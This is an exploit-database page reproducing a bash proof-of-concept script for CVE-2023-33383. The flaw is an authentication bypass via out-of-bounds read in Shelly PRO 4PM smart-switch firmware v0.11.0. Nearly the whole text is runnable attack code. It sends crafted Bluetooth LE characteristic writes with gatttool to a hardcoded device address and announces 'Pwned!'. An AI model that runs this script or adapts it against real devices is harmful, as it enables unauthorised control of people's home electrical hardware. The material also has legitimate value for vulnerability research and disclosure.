Share
## https://sploitus.com/exploit?id=PACKETSTORM:173954
#!/bin/bash  
  
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass  
# Google Dork: NA  
# Date: 2nd August 2023  
# Exploit Author: The Security Team [exploitsecurity.io]  
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability  
# Vendor Homepage: https://www.shelly.com/  
# Software Link: NA  
# Version: Firmware v0.11.0 (REQUIRED)  
# Tested on: MacOS/Linux  
# CVE : CVE-2023-33383  
  
IFS=  
failed=$false  
RED="\e[31m"  
GREEN="\e[92m"  
WHITE="\e[97m"  
ENDCOLOR="\e[0m"  
substring="Connection refused"  
  
  
banner()  
{  
clear  
echo -e "${GREEN}[+]*********************************************************[+]"  
echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"  
echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"  
echo -e "${GREEN}| CVE: CVE-2023-33383 |"  
echo -e "${GREEN}[+]*********************************************************[+]"  
echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"  
}  
  
banner  
read -s -n 1 key  
if [ "$key" = "x" ]; then  
exit 0;  
elif [ "$key" = "" ]; then  
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)  
if [ -z "$gattout" ]; then  
echo -e "${RED}Connection timed out${ENDCOLOR}"  
exit 0;  
else  
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1  
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"  
sleep 1  
if [ $? -eq 1 ]; then  
$failed=$true  
exit 0;  
fi  
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1  
sleep 1  
if [ $? -eq 1 ]; then  
$failed=$true  
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"  
exit 0;  
else  
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1  
sleep 1  
for i in {1..5}  
do  
echo -ne "${GREEN}."  
sleep 1  
done  
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"  
fi  
fi  
fi